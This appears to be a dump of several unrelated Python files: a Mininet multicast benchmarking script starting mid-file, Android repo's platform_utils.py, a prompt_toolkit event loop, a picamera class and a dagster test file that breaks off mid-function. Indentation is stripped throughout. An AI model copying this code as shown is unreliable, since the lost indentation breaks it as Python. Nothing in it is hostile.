net.addController('pox', RemoteController, ip = '127.0.0.1', port = 6633)
net.start()
for switch_name in topo.get_switch_list():
#print switch_name + ' route add -host 127.0.0.1 dev lo'
net.get(switch_name).controlIntf = net.get(switch_name).intf('lo')
net.get(switch_name).cmd('route add -host 127.0.0.1 dev lo')
#print 'pox' + ' route add -host ' + net.get(switch_name).IP() + ' dev lo'
net.get('pox').cmd('route add -host ' + net.get(switch_name).IP() + ' dev lo')
#print net.get(switch_name).cmd('ifconfig')
topo.mcastConfig(net)
# Wait for controller topology discovery
controller_init_sleep_time = 10
print 'Waiting ' + str(controller_init_sleep_time) + ' seconds to allow for controller topology discovery.'
sleep(controller_init_sleep_time)
# Mininet launched
# Generate the test groups, and launch the sender applications
rand_seed = int(time())
print 'Using random seed: ' + str(rand_seed)
np.random.seed(rand_seed)
trial_start_time = time() + MEDIA_DURATION_SECONDS + 10 # Assume generation of test group events will take no more than 10 seconds
trial_end_time = trial_start_time + TRIAL_DURATION_SECONDS
mcast_group_last_octet = 1
mcast_port = 5010
for i in range(0, number_of_groups):
mcast_ip = '224.1.1.{last_octet}'.format(last_octet = str(mcast_group_last_octet))
test_group = DynamicMulticastGroupDefinition(net.hosts, mcast_ip, mcast_port, mcast_port + 1)
print 'Generating events for group: ' + mcast_ip
test_group.generate_receiver_events(trial_start_time, TRIAL_DURATION_SECONDS, RECEIVERS_AT_TRIAL_START, ARRIVAL_RATE, SERVICE_RATE)
test_groups.append(test_group)
mcast_group_last_octet += 1
mcast_port += 2
test_group_start_times = []
for i in range(0, number_of_groups):
test_group_start_times.append(uniform(0, MEDIA_DURATION_SECONDS))
test_group_start_times.sort()
# Test groups generated
# Launch initial receiver applications
group_launch_index = 0
launch_start_time = time()
while len(test_group_start_times) > 0:
cur_time = time() - launch_start_time
if cur_time >= test_group_start_times[0]:
test_group_start_times.pop(0)
print 'Launching test group ' + str(group_launch_index) + ' at launch time: ' + str(cur_time)
test_groups[group_launch_index].launch_sender_application()
test_groups[group_launch_index].update_receiver_applications(trial_start_time)
group_launch_index += 1
else:
sleep_time = test_group_start_times[0] - cur_time
sleep(sleep_time)
# Wait for trial run start time
sleep_time = trial_start_time - time()
if sleep_time < 0:
print 'WARNING: sleep_time is negative!'
else:
print 'Waiting ' + str(sleep_time) + ' seconds to allow for group initialization.'
sleep(sleep_time) # Allow time for the controller to detect the topology
# Trial has started at this point
try:
while True:
cur_time = time()
if cur_time > trial_end_time:
print 'Reached trial end at time: ' + str(cur_time)
break
next_event_time = trial_end_time
for group in test_groups:
group.update_receiver_applications(cur_time)
next_event = group.get_next_receiver_event()
if next_event is not None and next_event[0] < next_event_time:
next_event_time = next_event[0]
sleep_time = next_event_time - time()
if sleep_time < 0:
print 'WARNING: sleep_time (' + str(sleep_time) + ') is negative!'
else:
#print 'Waiting ' + str(sleep_time) + ' for next event.\n'
sleep(sleep_time)
print 'Terminating network applications'
for group in test_groups:
group.terminate_group()
print 'Network applications terminated'
print 'Terminating controller'
pox_process.send_signal(signal.SIGINT)
sleep(1)
print 'Waiting for controller termination...'
pox_process.send_signal(signal.SIGKILL)
pox_process.wait()
print 'Controller terminated'
pox_process = None
net.stop()
sleep(3)
# Print packet loss statistics
recv_packets = sum(group.get_total_recv_packets() for group in test_groups)
lost_packets = sum(group.get_total_lost_packets() for group in test_groups)
packet_loss = 0
if (recv_packets + lost_packets) != 0:
packet_loss = (float(lost_packets) / (float(recv_packets) + float(lost_packets))) * 100
print 'RecvPackets: ' + str(recv_packets) + ' LostPackets: ' + str(lost_packets) + ' PacketLoss: ' + str(packet_loss) + '%'
# Calculate mean service time (sanity check to see that exponential service time generation is working as intended)
num_apps = 0
total_service_time = 0
for group in test_groups:
for recv_app in group.receiver_applications:
num_apps += 1
total_service_time += recv_app.service_time
print 'Average Service Time: ' + str(total_service_time / num_apps)
# Delete log file if test encountered an error, or write the statistic log file if the run was succesfull
if not test_success:
call('rm -rf ' + str(flow_log_path), shell=True)
call('rm -rf ' + str(event_log_path), shell=True)
else:
write_dynamic_stats_log(log_file_name, flow_log_path, event_log_path, test_groups, topo, ARRIVAL_RATE, SERVICE_RATE,
RECEIVERS_AT_TRIAL_START, trial_start_time, trial_end_time, STATS_RECORDING_INTERVAL)
except BaseException as e:
traceback.print_exc()
test_success = False
if pipe is not None:
pipe.send(test_success)
pipe.close()
topos = { 'mcast_test': ( lambda: MulticastTestTopo() ) }
def print_usage_text():
print 'GroupFlow Multicast Testing with Mininet'
print 'Usage - Automated Benchmarking:'
print '> mininet_multicast_pox <topology_path> <iterations_to_run> <log_file_prefix> <index_of_first_log_file> <parameter_sets (number is variable and unlimited)>'
print 'Parameter sets have the form: flow_replacement_mode,link_weight_type,number_of_groups'
print 'The topology path "manhattan" is currently hardcoded to generate a 20 Mbps, 5x5 Manhattan grid topology'
if __name__ == '__main__':
setLogLevel( 'info' )
# Uncomment for easy debug testing
# topo = ManhattanGridTopo(5, 4, 20, 1, False)
# hosts = topo.get_host_list()
# mcastTestDynamic(topo, hosts, 'test.log', 10, 'linear', 'none')
# sys.exit()
if len(sys.argv) >= 2:
if '-h' in str(sys.argv[1]) or 'help' in str(sys.argv[1]):
print_usage_text()
sys.exit()
if len(sys.argv) >= 6:
# Automated simulations - Differing link usage weights in Groupflow Module
log_prefix = sys.argv[3]
num_iterations = int(sys.argv[2])
first_index = int(sys.argv[4])
util_params = []
for param_index in range(5, len(sys.argv)):
param_split = sys.argv[param_index].split(',')
util_params.append((param_split[0], param_split[1], int(param_split[2])))
topo = None
if 'manhattan' in sys.argv[1]:
print 'Generating Manhattan Grid Topology'
topo = ManhattanGridTopo(5, 4, 20, 1, False)
else:
print 'Generating BRITE Specified Topology'
topo = BriteTopo(sys.argv[1])
hosts = topo.get_host_list()
start_time = time()
num_success = 0
num_failure = 0
print 'Simulations started at: ' + str(datetime.now())
for i in range(0,num_iterations):
for util_param in util_params:
test_success = False
while not test_success:
parent_pipe, child_pipe = Pipe()
p = Process(target=mcastTestDynamic, args=(topo, hosts, log_prefix + '_' + ','.join([util_param[0], util_param[1], str(util_param[2])]) + '_' + str(i + first_index) + '.log', util_param[0], util_param[1], util_param[2], child_pipe))
sim_start_time = time()
p.start()
p.join()
sim_end_time = time()
# Make extra sure the network terminated cleanly
call(['python', 'kill_running_test.py'])
test_success = parent_pipe.recv()
parent_pipe.close()
print 'Test Success: ' + str(test_success)
if test_success:
num_success += 1
else:
num_failure += 1
print 'Simulation ' + str(i+1) + '_' + ','.join([util_param[0], util_param[1], str(util_param[2])]) + ' completed at: ' + str(datetime.now()) + ' (runtime: ' + str(sim_end_time - sim_start_time) + ' seconds)'
end_time = time()
print ' '
print 'Simulations completed at: ' + str(datetime.now())
print 'Total runtime: ' + str(end_time - start_time) + ' seconds'
print 'Average runtime per sim: ' + str((end_time - start_time) / (num_iterations * len(util_params))) + ' seconds'
print 'Number of failed sims: ' + str(num_failure)
print 'Number of successful sims: ' + str(num_success)
|
platform_utils.py
|
# -*- coding:utf-8 -*-
#
# Copyright (C) 2016 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import errno
import os
import platform
import select
import shutil
import stat
from pyversion import is_python3
if is_python3():
from queue import Queue
else:
from Queue import Queue
from threading import Thread
def isWindows():
""" Returns True when running with the native port of Python for Windows,
False when running on any other platform (including the Cygwin port of
Python).
"""
# Note: The cygwin port of Python returns "CYGWIN_NT_xxx"
return platform.system() == "Windows"
class FileDescriptorStreams(object):
""" Platform agnostic abstraction enabling non-blocking I/O over a
collection of file descriptors. This abstraction is required because
fctnl(os.O_NONBLOCK) is not supported on Windows.
"""
@classmethod
def create(cls):
""" Factory method: instantiates the concrete class according to the
current platform.
"""
if isWindows():
return _FileDescriptorStreamsThreads()
else:
return _FileDescriptorStreamsNonBlocking()
def __init__(self):
self.streams = []
def add(self, fd, dest, std_name):
""" Wraps an existing file descriptor as a stream.
"""
self.streams.append(self._create_stream(fd, dest, std_name))
def remove(self, stream):
""" Removes a stream, when done with it.
"""
self.streams.remove(stream)
@property
def is_done(self):
""" Returns True when all streams have been processed.
"""
return len(self.streams) == 0
def select(self):
""" Returns the set of streams that have data available to read.
The returned streams each expose a read() and a close() method.
When done with a stream, call the remove(stream) method.
"""
raise NotImplementedError
def _create_stream(fd, dest, std_name):
""" Creates a new stream wrapping an existing file descriptor.
"""
raise NotImplementedError
class _FileDescriptorStreamsNonBlocking(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that support
non blocking I/O.
"""
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.set_non_blocking()
def set_non_blocking(self):
import fcntl
flags = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
def fileno(self):
return self.fd.fileno()
def read(self):
return self.fd.read(4096)
def close(self):
self.fd.close()
def _create_stream(self, fd, dest, std_name):
return self.Stream(fd, dest, std_name)
def select(self):
ready_streams, _, _ = select.select(self.streams, [], [])
return ready_streams
class _FileDescriptorStreamsThreads(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that don't support
non blocking I/O. This implementation requires creating threads issuing
blocking read operations on file descriptors.
"""
def __init__(self):
super(_FileDescriptorStreamsThreads, self).__init__()
# The queue is shared accross all threads so we can simulate the
# behavior of the select() function
self.queue = Queue(10) # Limit incoming data from streams
def _create_stream(self, fd, dest, std_name):
return self.Stream(fd, dest, std_name, self.queue)
def select(self):
# Return only one stream at a time, as it is the most straighforward
# thing to do and it is compatible with the select() function.
item = self.queue.get()
stream = item.stream
stream.data = item.data
return [stream]
class QueueItem(object):
""" Item put in the shared queue """
def __init__(self, stream, data):
self.stream = stream
self.data = data
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name, queue):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.queue = queue
self.data = None
self.thread = Thread(target=self.read_to_queue)
self.thread.daemon = True
self.thread.start()
def close(self):
self.fd.close()
def read(self):
data = self.data
self.data = None
return data
def read_to_queue(self):
""" The thread function: reads everything from the file descriptor into
the shared queue and terminates when reaching EOF.
"""
for line in iter(self.fd.readline, b''):
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, line))
self.fd.close()
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, None))
def symlink(source, link_name):
"""Creates a symbolic link pointing to source named link_name.
Note: On Windows, source must exist on disk, as the implementation needs
to know whether to create a "File" or a "Directory" symbolic link.
"""
if isWindows():
import platform_utils_win32
source = _validate_winpath(source)
link_name = _validate_winpath(link_name)
target = os.path.join(os.path.dirname(link_name), source)
if isdir(target):
platform_utils_win32.create_dirsymlink(_makelongpath(source), link_name)
else:
platform_utils_win32.create_filesymlink(_makelongpath(source), link_name)
else:
return os.symlink(source, link_name)
def _validate_winpath(path):
path = os.path.normpath(path)
if _winpath_is_valid(path):
return path
raise ValueError("Path \"%s\" must be a relative path or an absolute "
"path starting with a drive letter".format(path))
def _winpath_is_valid(path):
"""Windows only: returns True if path is relative (e.g. ".\\foo") or is
absolute including a drive letter (e.g. "c:\\foo"). Returns False if path
is ambiguous (e.g. "x:foo" or "\\foo").
"""
assert isWindows()
path = os.path.normpath(path)
drive, tail = os.path.splitdrive(path)
if tail:
if not drive:
return tail[0] != os.sep # "\\foo" is invalid
else:
return tail[0] == os.sep # "x:foo" is invalid
else:
return not drive # "x:" is invalid
def _makelongpath(path):
"""Return the input path normalized to support the Windows long path syntax
("\\\\?\\" prefix) if needed, i.e. if the input path is longer than the
MAX_PATH limit.
"""
if isWindows():
# Note: MAX_PATH is 260, but, for directories, the maximum value is actually 246.
if len(path) < 246:
return path
if path.startswith(u"\\\\?\\"):
return path
if not os.path.isabs(path):
return path
# Append prefix and ensure unicode so that the special longpath syntax
# is supported by underlying Win32 API calls
return u"\\\\?\\" + os.path.normpath(path)
else:
return path
def rmtree(path, ignore_errors=False):
"""shutil.rmtree(path) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
onerror = None
if isWindows():
path = _makelongpath(path)
onerror = handle_rmtree_error
shutil.rmtree(path, ignore_errors=ignore_errors, onerror=onerror)
def handle_rmtree_error(function, path, excinfo):
# Allow deleting read-only files
os.chmod(path, stat.S_IWRITE)
function(path)
def rename(src, dst):
"""os.rename(src, dst) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
if isWindows():
# On Windows, rename fails if destination exists, see
# https://docs.python.org/2/library/os.html#os.rename
try:
os.rename(_makelongpath(src), _makelongpath(dst))
except OSError as e:
if e.errno == errno.EEXIST:
os.remove(_makelongpath(dst))
os.rename(_makelongpath(src), _makelongpath(dst))
else:
raise
else:
os.rename(src, dst)
def remove(path):
"""Remove (delete) the file path. This is a replacement for os.remove that
allows deleting read-only files on Windows, with support for long paths and
for deleting directory symbolic links.
Availability: Unix, Windows."""
if isWindows():
longpath = _makelongpath(path)
try:
os.remove(longpath)
except OSError as e:
if e.errno == errno.EACCES:
os.chmod(longpath, stat.S_IWRITE)
# Directory symbolic links must be deleted with 'rmdir'.
if islink(longpath) and isdir(longpath):
os.rmdir(longpath)
else:
os.remove(longpath)
else:
raise
else:
os.remove(path)
def walk(top, topdown=True, onerror=None, followlinks=False):
"""os.walk(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
return _walk_windows_impl(top, topdown, onerror, followlinks)
else:
return os.walk(top, topdown, onerror, followlinks)
def _walk_windows_impl(top, topdown, onerror, followlinks):
try:
names = listdir(top)
except Exception as err:
if onerror is not None:
onerror(err)
return
dirs, nondirs = [], []
for name in names:
if isdir(os.path.join(top, name)):
dirs.append(name)
else:
nondirs.append(name)
if topdown:
yield top, dirs, nondirs
for name in dirs:
new_path = os.path.join(top, name)
if followlinks or not islink(new_path):
for x in _walk_windows_impl(new_path, topdown, onerror, followlinks):
yield x
if not topdown:
yield top, dirs, nondirs
def listdir(path):
"""os.listdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.listdir(_makelongpath(path))
def rmdir(path):
"""os.rmdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
os.rmdir(_makelongpath(path))
def isdir(path):
"""os.path.isdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.path.isdir(_makelongpath(path))
def islink(path):
"""os.path.islink(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.islink(_makelongpath(path))
else:
return os.path.islink(path)
def readlink(path):
"""Return a string representing the path to which the symbolic link
points. The result may be either an absolute or relative pathname;
if it is relative, it may be converted to an absolute pathname using
os.path.join(os.path.dirname(path), result).
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.readlink(_makelongpath(path))
else:
return os.readlink(path)
def realpath(path):
"""Return the canonical path of the specified filename, eliminating
any symbolic links encountered in the path.
Availability: Windows, Unix.
"""
if isWindows():
current_path = os.path.abspath(path)
path_tail = []
for c in range(0, 100): # Avoid cycles
if islink(current_path):
target = readlink(current_path)
current_path = os.path.join(os.path.dirname(current_path), target)
else:
basename = os.path.basename(current_path)
if basename == '':
path_tail.append(current_path)
break
path_tail.append(basename)
current_path = os.path.dirname(current_path)
path_tail.reverse()
result = os.path.normpath(os.path.join(*path_tail))
return result
else:
return os.path.realpath(path)
|
posix.py
|
from __future__ import unicode_literals
import fcntl
import os
import signal
import threading
import time
from prompt_toolkit.terminal.vt100_input import InputStream
from prompt_toolkit.utils import DummyContext, in_main_thread
from prompt_toolkit.input import Input
from .base import EventLoop, INPUT_TIMEOUT
from .callbacks import EventLoopCallbacks
from .inputhook import InputHookContext
from .posix_utils import PosixStdinReader
from .utils import TimeIt
from .select import AutoSelector, Selector, fd_to_int
__all__ = (
'PosixEventLoop',
)
_now = time.time
class PosixEventLoop(EventLoop):
"""
Event loop for posix systems (Linux, Mac os X).
"""
def __init__(self, inputhook=None, selector=AutoSelector):
assert inputhook is None or callable(inputhook)
assert issubclass(selector, Selector)
self.running = False
self.closed = False
self._running = False
self._callbacks = None
self._calls_from_executor = []
self._read_fds = {} # Maps fd to handler.
self.selector = selector()
# Create a pipe for inter thread communication.
self._schedule_pipe = os.pipe()
fcntl.fcntl(self._schedule_pipe[0], fcntl.F_SETFL, os.O_NONBLOCK)
# Create inputhook context.
self._inputhook_context = InputHookContext(inputhook) if inputhook else None
def run(self, stdin, callbacks):
"""
The input 'event loop'.
"""
assert isinstance(stdin, Input)
assert isinstance(callbacks, EventLoopCallbacks)
assert not self._running
if self.closed:
raise Exception('Event loop already closed.')
self._running = True
self._callbacks = callbacks
inputstream = InputStream(callbacks.feed_key)
current_timeout = [INPUT_TIMEOUT] # Nonlocal
# Create reader class.
stdin_reader = PosixStdinReader(stdin.fileno())
# Only attach SIGWINCH signal handler in main thread.
# (It's not possible to attach signal handlers in other threads. In
# that case we should rely on a the main thread to call this manually
# instead.)
if in_main_thread():
ctx = call_on_sigwinch(self.received_winch)
else:
ctx = DummyContext()
def read_from_stdin():
" Read user input. "
# Feed input text.
data = stdin_reader.read()
inputstream.feed(data)
# Set timeout again.
current_timeout[0] = INPUT_TIMEOUT
# Quit when the input stream was closed.
if stdin_reader.closed:
self.stop()
self.add_reader(stdin, read_from_stdin)
self.add_reader(self._schedule_pipe[0], None)
with ctx:
while self._running:
# Call inputhook.
if self._inputhook_context:
with TimeIt() as inputhook_timer:
def ready(wait):
" True when there is input ready. The inputhook should return control. "
return self._ready_for_reading(current_timeout[0] if wait else 0) != []
self._inputhook_context.call_inputhook(ready)
inputhook_duration = inputhook_timer.duration
else:
inputhook_duration = 0
# Calculate remaining timeout. (The inputhook consumed some of the time.)
if current_timeout[0] is None:
remaining_timeout = None
else:
remaining_timeout = max(0, current_timeout[0] - inputhook_duration)
# Wait until input is ready.
fds = self._ready_for_reading(remaining_timeout)
# When any of the FDs are ready. Call the appropriate callback.
if fds:
# Create lists of high/low priority tasks. The main reason
# for this is to allow painting the UI to happen as soon as
# possible, but when there are many events happening, we
# don't want to call the UI renderer 1000x per second. If
# the eventloop is completely saturated with many CPU
# intensive tasks (like processing input/output), we say
# that drawing the UI can be postponed a little, to make
# CPU available. This will be a low priority task in that
# case.
tasks = []
low_priority_tasks = []
now = None # Lazy load time. (Fewer system calls.)
for fd in fds:
# For the 'call_from_executor' fd, put each pending
# item on either the high or low priority queue.
if fd == self._schedule_pipe[0]:
for c, max_postpone_until in self._calls_from_executor:
if max_postpone_until is None:
# Execute now.
tasks.append(c)
else:
# Execute soon, if `max_postpone_until` is in the future.
now = now or _now()
if max_postpone_until < now:
tasks.append(c)
else:
low_priority_tasks.append((c, max_postpone_until))
self._calls_from_executor = []
# Flush all the pipe content.
os.read(self._schedule_pipe[0], 1024)
else:
handler = self._read_fds.get(fd)
if handler:
tasks.append(handler)
# When there are high priority tasks, run all these.
# Schedule low priority tasks for the next iteration.
if tasks:
for t in tasks:
t()
# Postpone low priority tasks.
for t, max_postpone_until in low_priority_tasks:
self.call_from_executor(t, _max_postpone_until=max_postpone_until)
else:
# Currently there are only low priority tasks -> run them right now.
for t, _ in low_priority_tasks:
t()
else:
# Flush all pending keys on a timeout. (This is most
# important to flush the vt100 'Escape' key early when
# nothing else follows.)
inputstream.flush()
# Fire input timeout event.
callbacks.input_timeout()
current_timeout[0] = None
self.remove_reader(stdin)
self.remove_reader(self._schedule_pipe[0])
self._callbacks = None
def _ready_for_reading(self, timeout=None):
"""
Return the file descriptors that are ready for reading.
"""
fds = self.selector.select(timeout)
return fds
def received_winch(self):
"""
Notify the event loop that SIGWINCH has been received
"""
# Process signal asynchronously, because this handler can write to the
# output, and doing this inside the signal handler causes easily
# reentrant calls, giving runtime errors..
# Furthur, this has to be thread safe. When the CommandLineInterface
# runs not in the main thread, this function still has to be called
# from the main thread. (The only place where we can install signal
# handlers.)
def process_winch():
if self._callbacks:
self._callbacks.terminal_size_changed()
self.call_from_executor(process_winch)
def run_in_executor(self, callback):
"""
Run a long running function in a background thread.
(This is recommended for code that could block the event loop.)
Similar to Twisted's ``deferToThread``.
"""
# Wait until the main thread is idle.
# We start the thread by using `call_from_executor`. The event loop
# favours processing input over `calls_from_executor`, so the thread
# will not start until there is no more input to process and the main
# thread becomes idle for an instant. This is good, because Python
# threading favours CPU over I/O -- an autocompletion thread in the
# background would cause a significantly slow down of the main thread.
# It is mostly noticable when pasting large portions of text while
# having real time autocompletion while typing on.
def start_executor():
threading.Thread(target=callback).start()
self.call_from_executor(start_executor)
def call_from_executor(self, callback, _max_postpone_until=None):
"""
Call this function in the main event loop.
Similar to Twisted's ``callFromThread``.
:param _max_postpone_until: `None` or `time.time` value. For interal
use. If the eventloop is saturated, consider this task to be low
priority and postpone maximum until this timestamp. (For instance,
repaint is done using low priority.)
"""
assert _max_postpone_until is None or isinstance(_max_postpone_until, float)
self._calls_from_executor.append((callback, _max_postpone_until))
if self._schedule_pipe:
try:
os.write(self._schedule_pipe[1], b'x')
except (AttributeError, IndexError, OSError):
# Handle race condition. We're in a different thread.
# - `_schedule_pipe` could have become None in the meantime.
# - We catch `OSError` (actually BrokenPipeError), because the
# main thread could have closed the pipe already.
pass
def stop(self):
"""
Stop the event loop.
"""
self._running = False
def close(self):
self.closed = True
# Close pipes.
schedule_pipe = self._schedule_pipe
self._schedule_pipe = None
if schedule_pipe:
os.close(schedule_pipe[0])
os.close(schedule_pipe[1])
if self._inputhook_context:
self._inputhook_context.close()
def add_reader(self, fd, callback):
" Add read file descriptor to the event loop. "
fd = fd_to_int(fd)
self._read_fds[fd] = callback
self.selector.register(fd)
def remove_reader(self, fd):
" Remove read file descriptor from the event loop. "
fd = fd_to_int(fd)
if fd in self._read_fds:
del self._read_fds[fd]
self.selector.unregister(fd)
class call_on_sigwinch(object):
"""
Context manager which Installs a SIGWINCH callback.
(This signal occurs when the terminal size changes.)
"""
def __init__(self, callback):
self.callback = callback
self.previous_callback = None
def __enter__(self):
self.previous_callback = signal.signal(signal.SIGWINCH, lambda *a: self.callback())
def __exit__(self, *a, **kw):
if self.previous_callback is None:
# Normally, `signal.signal` should never return `None`.
# For some reason it happens here:
# https://github.com/jonathanslenders/python-prompt-toolkit/pull/174
signal.signal(signal.SIGWINCH, 0)
else:
signal.signal(signal.SIGWINCH, self.previous_callback)
|
camera.py
|
#!/usr/bin/python
import os, io, threading, picamera
from picamera import PiCamera
class Camera(object):
running = True
current_frame = None
thread = None
camera = None
def __init__(self, resolution="VGA",quality=50,framerate=60):
self.resolution = resolution
self.quality = quality
self.framerate = framerate
self.newframe_notify = threading.Event()
def outputs(self):
stream = io.BytesIO()
while self.running:
yield stream
stream.seek(0)
self.current_frame = stream.getvalue()
self.newframe_notify.set()
stream.seek(0)
stream.truncate()
self.current_frame = None
def start(self):
if self.thread: return
self.running = True
self.thread = threading.Thread(name="CameraThread", target=self._run)
self.thread.daemon = True
self.thread.start()
def stop(self):
if not self.thread: return
self.running = False
self.thread.join()
self.thread = None
def _run(self):
try:
self.camera = picamera.PiCamera()
self.camera.resolution = self.resolution
self.camera.framerate = self.framerate
self.camera.capture_sequence(self.outputs(), 'jpeg', use_video_port=True, quality=self.quality)
finally:
self.camera.close()
print('Camera closed!')
|
test_external_step.py
|
import os
import tempfile
import time
import uuid
from threading import Thread
import pytest
from dagster import (
Field,
ModeDefinition,
RetryRequested,
String,
execute_pipeline,
execute_pipeline_iterator,
pipeline,
reconstructable,
resource,
solid,
)
from dagster.core.definitions.no_step_launcher import no_step_launcher
from dagster.core.errors import DagsterExecutionInterruptedError
from dagster.core.events import DagsterEventType
from dagster.core.execution.api import create_execution_plan
from dagster.core.execution.context_creation_pipeline import PipelineExecutionContextManager
from dagster.core.execution.plan.external_step import (
LocalExternalStepLauncher,
local_external_step_launcher,
step_context_to_step_run_ref,
step_run_ref_to_step_context,
)
from dagster.core.instance import DagsterInstance
from dagster.core.storage.pipeline_run import PipelineRun
from dagster.utils import safe_tempfile_path, send_interrupt
from dagster.utils.merger import deep_merge_dicts
RUN_CONFIG_BASE = {"solids": {"return_two": {"config": {"a": "b"}}}}
def make_run_config(scratch_dir, mode):
if mode in ["external", "request_retry"]:
step_launcher_resource_keys = ["first_step_launcher", "second_step_launcher"]
else:
step_launcher_resource_keys = ["second_step_launcher"]
return deep_merge_dicts(
RUN_CONFIG_BASE,
{
"resources": {
step_launcher_resource_key: {"config": {"scratch_dir": scratch_dir}}
for step_launcher_resource_key in step_launcher_resource_keys
},
"intermediate_storage": {"filesystem": {"config": {"base_dir": scratch_dir}}},
},
)
class RequestRetryLocalExternalStepLauncher(LocalExternalStepLauncher):
def launch_step(self, step_context, prior_attempts_count):
if prior_attempts_count == 0:
raise RetryRequested()
else:
return super(RequestRetryLocalExternalStepLauncher, self).launch_step(
step_context, prior_attempts_count
)
@resource(config_schema=local_external_step_launcher.config_schema)
def request_retry_local_external_step_launcher(context):
return RequestRetryLocalExternalStepLauncher(**context.resource_config)
def define_basic_pipeline():
@solid(required_resource_keys=set(["first_step_launcher"]), config_schema={"a": Field(str)})
def return_two(_):
return 2
@solid(required_resource_keys=set(["second_step_launcher"]))
def add_one(_, num):
return num + 1
@pipeline(
mode_defs=[
ModeDefinition(
"external",
resource_defs={
"first_step_launcher": local_external_step_launcher,
"second_step_launcher": local_external_step_launcher,
},
),
ModeDefinition(
"internal_and_external",
resource_defs={
"first_step_launcher": no_step_launcher,
"second_step_launcher": local_external_step_launcher,
},
),
ModeDefinition(
"request_retry",
resource_defs={
"first_step_launcher": request_retry_local_external_step_launcher,
"second_step_launcher": request_retry_local_external_step_launcher,
},
),
]
)
def basic_pipeline():
add_one(return_two())
return basic_pipeline
def define_sleepy_pipeline():
@solid(
config_schema={"tempfile": Field(String)},
required_resource_keys=set(["first_step_launcher"]),
)
def sleepy_solid(context):
with open(context.solid_config["tempfile"], "w") as ff:
ff.write("yup")
start_time = time.time()
while True:
time.sleep(0.1)
if time.time() - start_time > 120:
raise Exception("Timed out")
@pipeline(
mode_defs=[
ModeDefinition(
"external",
resource_defs={
"first_step_launcher": local_external_step_launcher,
},
),
]
)
def sleepy_pipeline():
sleepy_solid()
return sleepy_pipeline
def initialize_step_context(scratch_dir, instance):
pipeline_run = PipelineRun(
pipeline_name="foo_pipeline",
run_id=str(uuid.uuid4()),
run_config=make_run_config(scratch_dir, "external"),
mode="external",
)
recon_pipeline = reconstructable(define_basic_pipeline)
plan = create_execution_plan(recon_pipeline, pipeline_run.run_config, mode="external")
initialization_manager = PipelineExecutionContextManager(
recon_pipeline,
plan,
pipeline_run.run_config,
pipeline_run,
instance,
)
for _ in initialization_manager.prepare_context():
pass
pipeline_context = initialization_manager.get_context()
step_context = pipeline_context.for_step(plan.get_step_by_key("return_two"))
return step_context
def test_step_context_to_step_run_ref():
with DagsterInstance.ephemeral() as instance:
step_context = initialize_step_context("", instance)
step = step_context.step
step_run_ref = step_context_to_step_run_ref(step_context, 0)
assert step_run_ref.run_config == step_context.pipeline_run.run_config
assert step_run_ref.run_id == step_context.pipeline_run.run_id
rehydrated_step_context = step_run_ref_to_step_context(step_run_ref, instance)
assert rehydrated_step_context.required_resource_keys == step_context.required_resource_keys
rehydrated_step = rehydrated_step_context.step
assert rehydrated_step.pipeline_name == step.pipeline_name
assert rehydrated_step.step_inputs == step.step_inputs
assert rehydrated_step.step_outputs == step.step_outputs
assert rehydrated_step.kind == step.kind
assert rehydrated_step.solid_handle.name == step.solid_handle.name
assert rehydrated_step.logging_tags == step.logging_tags
assert rehydrated_step.tags == step.tags
def test_local_external_step_launcher():
with tempfile.TemporaryDirectory() as tmpdir:
with DagsterInstance.ephemeral() as instance:
step_context = initialize_step_context(tmpdir, instance)
step_launcher = LocalExternalStepLauncher(tmpdir)
events = list(step_launcher.launch_step(step_context, 0))
event_types = [event.event_type for event in events]
assert DagsterEventType.STEP_START in event_types
assert DagsterEventType.STEP_SUCCESS in event_types
assert DagsterEventType.STEP_FAILURE not in event_types
@pytest.mark.parametrize("mode", ["external", "internal_and_external"])
def test_pipeline(mode):
with tempfile.TemporaryDirectory() as tmpdir:
result = execute_pipeline(
pipeline=reconstructable(define_basic_pipeline),
mode=mode,
run_config=make_run_config(tmpdir, mode),
)
assert result.result_for_solid("return_two").output_value() == 2
assert result.result_for_solid("add_one").output_value() == 3
def test_launcher_requests_retry():
mode = "request_retry"
with tempfile.TemporaryDirectory() as tmpdir:
result = execute_pipeline(
pipeline=reconstructable(define_basic_pipeline),
mode=mode,
run_config=make_run_config(tmpdir, mode),
)
assert result.success
assert result.result_for_solid("return_two").output_value() == 2
assert result.result_for_solid("add_one").output_value() == 3
for step_key, events in result.events_by_step_key.items():
if step_key:
event_types = [event.event_type for event in events]
assert DagsterEventType.STEP_UP_FOR_RETRY in event_types
assert DagsterEventType.STEP_RESTARTED in event_types
def _send_interrupt_thread(temp_file):
while not os.path.exists(temp_file):
time.sleep(0.1)
send_interrupt()
@pytest.mark.parametrize("mode", ["external"])
def test_interrupt_step_launcher(mode):
with tempfile.TemporaryDirectory() as tmpdir:
with safe_tempfile_path() as success_tempfile:
sleepy_run_config = {
"resources": {"first_step_launcher": {"config": {"scratch_dir": tmpdir}}},
"intermediate_storage": {"filesystem": {"config": {"base_dir": tmpdir}}},
"solids": {"sleepy_solid": {"config": {"tempfile": success_tempfile}}},
}
